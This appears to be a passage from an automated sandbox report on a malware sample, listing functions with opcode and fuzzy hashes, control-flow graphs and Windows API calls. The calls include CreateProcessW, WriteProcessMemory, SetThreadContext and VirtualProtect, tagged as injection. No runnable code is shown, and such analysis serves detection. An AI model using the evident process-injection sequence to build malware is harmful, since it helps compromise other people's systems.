                                                                                            • API String ID:
                                                                                            • Opcode ID: 95801aecad5ded544de8286481929f5ced9de81e074db82bfd4574d3889f5ab7
                                                                                            • Instruction ID: 13133ce43fe43017880fd276189c65a070370a2b6cd509685176ddba9a63df18
                                                                                            • Opcode Fuzzy Hash: 95801aecad5ded544de8286481929f5ced9de81e074db82bfd4574d3889f5ab7
                                                                                            • Instruction Fuzzy Hash: DAA11774E056598BCB08CFE9C6446AEFBF2BF88310F24D169D419BB358E7349942CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02EC81C0 Relevance: .2, Instructions: 237COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dfbe3519c1ef42cea22c35e34aed1030e2c3128fc4fe664cb427d87a82e5b092
                                                                                            • Instruction ID: 21bdedc54d1c18b59e37d96e056c264ef5112f471000ee56126ed7c29b0483f7
                                                                                            • Opcode Fuzzy Hash: dfbe3519c1ef42cea22c35e34aed1030e2c3128fc4fe664cb427d87a82e5b092
                                                                                            • Instruction Fuzzy Hash: B3A11774E056598BCB09CFE9C6446AEFBF2BF88310F24D16AD419BB358D7349942CB60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02EC0006 Relevance: .1, Instructions: 89COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3322338bcd93d0c985d93f9802cfdb205a266cb6d4b861b7bcd58c08e8c60b7b
                                                                                            • Instruction ID: 0f0f147869b358c05a74e13f215f62a16defbbf82f421f2e038615df808d340c
                                                                                            • Opcode Fuzzy Hash: 3322338bcd93d0c985d93f9802cfdb205a266cb6d4b861b7bcd58c08e8c60b7b
                                                                                            • Instruction Fuzzy Hash: 67312D71D056888FDB19CFAACC543DEFFF2AFCA310F18C0AAD444AA265DA341946CB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02EC0040 Relevance: .1, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8b95e97a2493bd86f34c631dac7fddaf5fcff0503c515829cfbc3c05b9f5ac40
                                                                                            • Instruction ID: 34849fc35dd64804da3014a8744f66d067b69588f346324704f477ca4266d370
                                                                                            • Opcode Fuzzy Hash: 8b95e97a2493bd86f34c631dac7fddaf5fcff0503c515829cfbc3c05b9f5ac40
                                                                                            • Instruction Fuzzy Hash: 4A31C371E006188BEB18CFABD9446DEFBF7AFC8310F14C16AD509A6258DB741A46CA90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02ECEC18 Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9c96c8948ab45e801fa57ce43504e696180d6e37a27024bcade09e5537ca6600
                                                                                            • Instruction ID: 09dda94e71c185ae87649ae148317c5f7835c5b165ca48e332eced238ce47555
                                                                                            • Opcode Fuzzy Hash: 9c96c8948ab45e801fa57ce43504e696180d6e37a27024bcade09e5537ca6600
                                                                                            • Instruction Fuzzy Hash: 00112730D45298CFDB158FA5C919BEEBBF1AB4E305F28A06AD411B7280C7788945CB69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01576A40 Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 01576AB0
                                                                                            • GetCurrentThread.KERNEL32 ref: 01576AED
                                                                                            • GetCurrentProcess.KERNEL32 ref: 01576B2A
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 01576B83
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: bad489ec7fe2b62dbed49e4e1f5994e2fb9a6ec3366bdfaf0ecb9e6a8b7cae82
                                                                                            • Instruction ID: 483264db2a8d8eae039cb00045d581bd43368077bdefced693c0ccff31b6d3c8
                                                                                            • Opcode Fuzzy Hash: bad489ec7fe2b62dbed49e4e1f5994e2fb9a6ec3366bdfaf0ecb9e6a8b7cae82
                                                                                            • Instruction Fuzzy Hash: 115137B0901649CFDB15CFAAD588BDEBFF0FF88304F24846AD019AB250D7749884CB65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01576A50 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 01576AB0
                                                                                            • GetCurrentThread.KERNEL32 ref: 01576AED
                                                                                            • GetCurrentProcess.KERNEL32 ref: 01576B2A
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 01576B83
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: 47eb0b4d30a5f486319c4eb06b82a544439807d4a138d447d616def1c74f6a93
                                                                                            • Instruction ID: ca40f643d3880e7220be910bd18d948635b386b7e66da3ae3bffa292c5a2405e
                                                                                            • Opcode Fuzzy Hash: 47eb0b4d30a5f486319c4eb06b82a544439807d4a138d447d616def1c74f6a93
                                                                                            • Instruction Fuzzy Hash: C75136B09016498FEB14DFAAD548BDEBFF0FF88314F208469E019BB250D7749884CB65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0157BA50 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 38 157ba50-157ba75 call 157a944 41 157ba77 38->41 42 157ba8b-157ba8f 38->42 91 157ba7d call 157bcd8 41->91 92 157ba7d call 157bce8 41->92 43 157baa3-157bae4 42->43 44 157ba91-157ba9b 42->44 49 157bae6-157baee 43->49 50 157baf1-157baff 43->50 44->43 45 157ba83-157ba85 45->42 46 157bbc0-157bc80 45->46 86 157bc82-157bc85 46->86 87 157bc88-157bcb3 GetModuleHandleW 46->87 49->50 52 157bb23-157bb25 50->52 53 157bb01-157bb06 50->53 54 157bb28-157bb2f 52->54 55 157bb11 53->55 56 157bb08-157bb0f call 157a950 53->56 58 157bb31-157bb39 54->58 59 157bb3c-157bb43 54->59 57 157bb13-157bb21 55->57 56->57 57->54 58->59 62 157bb45-157bb4d 59->62 63 157bb50-157bb59 call 157a960 59->63 62->63 68 157bb66-157bb6b 63->68 69 157bb5b-157bb63 63->69 71 157bb6d-157bb74 68->71 72 157bb89-157bb8d 68->72 69->68 71->72 74 157bb76-157bb86 call 157a6e8 call 157a970 71->74 75 157bb93-157bb96 72->75 74->72 78 157bbb9-157bbbf 75->78 79 157bb98-157bbb6 75->79 79->78 86->87 88 157bcb5-157bcbb 87->88 89 157bcbc-157bcd0 87->89 88->89 91->45 92->45
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0157BCA6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 5d29dd363d6888d532ebb08d8f6d03f679030cfbfa257072eb22dc4ec0c1cf72
                                                                                            • Instruction ID: 959fa138c08ce02bb12b6017de00189c8b0b2a6c76d19de50441c487979ed6ed
                                                                                            • Opcode Fuzzy Hash: 5d29dd363d6888d532ebb08d8f6d03f679030cfbfa257072eb22dc4ec0c1cf72
                                                                                            • Instruction Fuzzy Hash: 027126B0A00B068FD724DF2AD55176ABBF1FF88200F10892ED48ADBA50DB75E805CF91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02ECD1D8 Relevance: 1.6, APIs: 1, Instructions: 143processCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 93 2ecd1d8-2ecd263 95 2ecd26e-2ecd275 93->95 96 2ecd265-2ecd26b 93->96 97 2ecd277-2ecd27d 95->97 98 2ecd280-2ecd296 95->98 96->95 97->98 99 2ecd298-2ecd29e 98->99 100 2ecd2a1-2ecd33e CreateProcessW 98->100 99->100 102 2ecd347-2ecd3bb 100->102 103 2ecd340-2ecd346 100->103 111 2ecd3cd-2ecd3d4 102->111 112 2ecd3bd-2ecd3c3 102->112 103->102 113 2ecd3eb 111->113 114 2ecd3d6-2ecd3e5 111->114 112->111 114->113
                                                                                            APIs
                                                                                            • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 02ECD32B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: 51e2a269421f3f53bc564e1d54bff5f8ee98e65286baa621856ab5bb8615651f
                                                                                            • Instruction ID: ea4eb0d09959ada1f84a2be0bc9fde81d0e5189e12198aba11b9560bf89d5323
                                                                                            • Opcode Fuzzy Hash: 51e2a269421f3f53bc564e1d54bff5f8ee98e65286baa621856ab5bb8615651f
                                                                                            • Instruction Fuzzy Hash: 8A5116719013199FDB60DF99C980BDEBBB5BF48304F1480AAE809B7250CB759A85CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0157DF18 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 130 157df18-157df7e 131 157df80-157df86 130->131 132 157df89-157df90 130->132 131->132 133 157df92-157df98 132->133 134 157df9b-157e03a CreateWindowExW 132->134 133->134 136 157e043-157e07b 134->136 137 157e03c-157e042 134->137 141 157e07d-157e080 136->141 142 157e088 136->142 137->136 141->142 143 157e089 142->143 143->143
                                                                                            APIs
                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0157E02A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateWindow
                                                                                            • String ID:
                                                                                            • API String ID: 716092398-0
                                                                                            • Opcode ID: fc522189000e67eff83ff8d13d8f32ae71abb76542dec6cc62a339f497ac53e2
                                                                                            • Instruction ID: c97b0c0b3d9b8a0357f01a1a140a48128f9bdedd9931cf82d06f7b8cb619cbdd
                                                                                            • Opcode Fuzzy Hash: fc522189000e67eff83ff8d13d8f32ae71abb76542dec6cc62a339f497ac53e2
                                                                                            • Instruction Fuzzy Hash: C041BEB1D00309DFDB14CFAAD885ADEBBB5FF48310F24852AE419AB210D774A985CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0157DF0D Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 116 157df0d-157df7e 117 157df80-157df86 116->117 118 157df89-157df90 116->118 117->118 119 157df92-157df98 118->119 120 157df9b-157dfd3 118->120 119->120 121 157dfdb-157e03a CreateWindowExW 120->121 122 157e043-157e07b 121->122 123 157e03c-157e042 121->123 127 157e07d-157e080 122->127 128 157e088 122->128 123->122 127->128 129 157e089 128->129 129->129
                                                                                            APIs
                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0157E02A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateWindow
                                                                                            • String ID:
                                                                                            • API String ID: 716092398-0
                                                                                            • Opcode ID: 7f301d6278052c91ff8cf31d5447852ec5fb74e4458eead14a3f467afb0978da
                                                                                            • Instruction ID: 4502d05e34101ea6f35a98db563292b1898352c7d3634ebcd44d7033aec8094f
                                                                                            • Opcode Fuzzy Hash: 7f301d6278052c91ff8cf31d5447852ec5fb74e4458eead14a3f467afb0978da
                                                                                            • Instruction Fuzzy Hash: E241DFB1D00309DFDB15CFA9D985ADEBBB5FF48310F24852AE819AB210D7749985CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01577009 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 242 1577009-1577010 243 1577012-1577041 call 1576c44 242->243 244 157707a-1577114 DuplicateHandle 242->244 248 1577046-157706c 243->248 246 1577116-157711c 244->246 247 157711d-157713a 244->247 246->247
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01577107
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: ad4fc553a1346f104169da95aaff1ed691e03e5ba8bba68ae6d9deef60753392
                                                                                            • Instruction ID: 2a564b958b83f2c33cb574a46d1b9ece862246955e7f1616abbdcfb9709fa5c0
                                                                                            • Opcode Fuzzy Hash: ad4fc553a1346f104169da95aaff1ed691e03e5ba8bba68ae6d9deef60753392
                                                                                            • Instruction Fuzzy Hash: 264149B6900259AFCB01CFA9E844AEEBFF5FF88310F14805AE954A7311C3759914DFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01577078 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 253 1577078-157707e 254 1577080-1577114 DuplicateHandle 253->254 255 1577116-157711c 254->255 256 157711d-157713a 254->256 255->256
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01577107
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: c968ac03b0457642beb4f0dcc2863d0932577f9b7b459383f7a174d670acfbf0
                                                                                            • Instruction ID: d24d96dda67b4f28f355acde51dc505cfafc83de00b23c009760b45500a6289c
                                                                                            • Opcode Fuzzy Hash: c968ac03b0457642beb4f0dcc2863d0932577f9b7b459383f7a174d670acfbf0
                                                                                            • Instruction Fuzzy Hash: A521E5B5900209AFDB10CFAAE984ADEBFF4FF48310F24841AE954A7310D374A954DFA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02ECD898 Relevance: 1.6, APIs: 1, Instructions: 65injectionCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 259 2ecd898-2ecd8e9 261 2ecd8f9-2ecd932 WriteProcessMemory 259->261 262 2ecd8eb-2ecd8f7 259->262 263 2ecd93b-2ecd95c 261->263 264 2ecd934-2ecd93a 261->264 262->261 264->263
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02ECD925
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: 916fd783a4d81d73351dfbbe76ea98d58c8a90395f92e49abb417b27395acd6d
                                                                                            • Instruction ID: c87b28be0e09736d1b51fa72552af8c95fe7763b87f8a9ce700e40adf7abed55
                                                                                            • Opcode Fuzzy Hash: 916fd783a4d81d73351dfbbe76ea98d58c8a90395f92e49abb417b27395acd6d
                                                                                            • Instruction Fuzzy Hash: FE21E2B59003499FCB10CFAAD985BDEBBF4FB48314F10842AE959A7250D778A944CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0157A980 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 271 157a980-157bf08 274 157bf10-157bf3f LoadLibraryExW 271->274 275 157bf0a-157bf0d 271->275 276 157bf41-157bf47 274->276 277 157bf48-157bf65 274->277 275->274 276->277
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0157BD21,00000800,00000000,00000000), ref: 0157BF32
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 45674d811e5fea1b1864b7c29f16150c7e9272017792c5e08a33494209e72a87
                                                                                            • Instruction ID: e7a2527ea9425b21dce9d4b03ca645af6ba2dd0ae88c25cef270049505972590
                                                                                            • Opcode Fuzzy Hash: 45674d811e5fea1b1864b7c29f16150c7e9272017792c5e08a33494209e72a87
                                                                                            • Instruction Fuzzy Hash: 40216AB28043498FCB10CFAAD844ADEBFF4FF49710F14895AD955AB240C375A545CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01577080 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 266 1577080-1577114 DuplicateHandle 267 1577116-157711c 266->267 268 157711d-157713a 266->268 267->268
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01577107
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 1da7df45770180b38da5e98b3d6989b9772c983a66af89454902a54f08cbdf67
                                                                                            • Instruction ID: 915d0299d77ea5449052640b29187bc86214c4c82109ff336ee050b47c7407f7
                                                                                            • Opcode Fuzzy Hash: 1da7df45770180b38da5e98b3d6989b9772c983a66af89454902a54f08cbdf67
                                                                                            • Instruction Fuzzy Hash: A421E4B59002099FDB10CFAAE984ADEBFF4FB48320F14841AE954A7310D374A944DFA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02ECD608 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 280 2ecd608-2ecd694 ReadProcessMemory 282 2ecd69d-2ecd6be 280->282 283 2ecd696-2ecd69c 280->283 283->282
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02ECD687
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: 12fc4f32e123d813ff48649cbe87858dabdaf209ff7884576b112f25235aa469
                                                                                            • Instruction ID: 0e5d8b0f5e482a62a0df6c7b5b68b4ba607088bbc2bec67302c7909a418208df
                                                                                            • Opcode Fuzzy Hash: 12fc4f32e123d813ff48649cbe87858dabdaf209ff7884576b112f25235aa469
                                                                                            • Instruction Fuzzy Hash: 0221EFB19003499FCB10CF9AD984ADEBBF4FB48320F10842AE959A7250D379A944DFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02ECD548 Relevance: 1.6, APIs: 1, Instructions: 58threadinjectionCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 285 2ecd548-2ecd594 287 2ecd596-2ecd59e 285->287 288 2ecd5a0-2ecd5cc SetThreadContext 285->288 287->288 289 2ecd5ce-2ecd5d4 288->289 290 2ecd5d5-2ecd5f6 288->290 289->290
                                                                                            APIs
                                                                                            • SetThreadContext.KERNELBASE(?,00000000), ref: 02ECD5BF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThread
                                                                                            • String ID:
                                                                                            • API String ID: 1591575202-0
                                                                                            • Opcode ID: 2358d15ad5a603b58c6bcde066dbc31b5ec807482ce9820e0e5af164fd127880
                                                                                            • Instruction ID: e00a074b783d9ca91dae1979867df8822c69c75e15143836b88589b35c0a3b53
                                                                                            • Opcode Fuzzy Hash: 2358d15ad5a603b58c6bcde066dbc31b5ec807482ce9820e0e5af164fd127880
                                                                                            • Instruction Fuzzy Hash: FB21F2B1D1061A9FCB10CF9AC985BEEFBF4BB48724F14812AD418B7640D778A9458FA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02EC6CA8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02EC6D1B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 544645111-0
                                                                                            • Opcode ID: ff020dd95dd3f81145db5d0fbec3e9381afccc11a6d791dd705f428c367c5339
                                                                                            • Instruction ID: b4e924c183425107cebabca2a62024770e4d5b19afe8aef05d3ea1b4bb19f41c
                                                                                            • Opcode Fuzzy Hash: ff020dd95dd3f81145db5d0fbec3e9381afccc11a6d791dd705f428c367c5339
                                                                                            • Instruction Fuzzy Hash: 6621E7B1D002099FCB10DF9AC984BDEFBF4FB48320F108429E559A7250D778A545DFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02EC6CA0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02EC6D1B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 544645111-0
                                                                                            • Opcode ID: 89f0bca5f64159ff295d21ff41adfc480c3ae8d3a0ea8d030f0e9eac4fbae573
                                                                                            • Instruction ID: 6069d83e0aa4cf9c3881be98596e516237a174d5c5b33657193d4e352367c9df
                                                                                            • Opcode Fuzzy Hash: 89f0bca5f64159ff295d21ff41adfc480c3ae8d3a0ea8d030f0e9eac4fbae573
                                                                                            • Instruction Fuzzy Hash: D421D6B5D006099FCB10CF9AC984BDEBBF4FB48320F248429E559A7650D378A645DFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0157A998 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 292 157a998-157bf08 294 157bf10-157bf3f LoadLibraryExW 292->294 295 157bf0a-157bf0d 292->295 296 157bf41-157bf47 294->296 297 157bf48-157bf65 294->297 295->294 296->297
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0157BD21,00000800,00000000,00000000), ref: 0157BF32
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: e17f94d9c4586a1bbd9898dd294b5ec681bb612f5795e569833777e46aaf3228
                                                                                            • Instruction ID: c210d05cb9369515404ef6c521b40782f9ce0decf957c4dc4b63f924bab6127d
                                                                                            • Opcode Fuzzy Hash: e17f94d9c4586a1bbd9898dd294b5ec681bb612f5795e569833777e46aaf3228
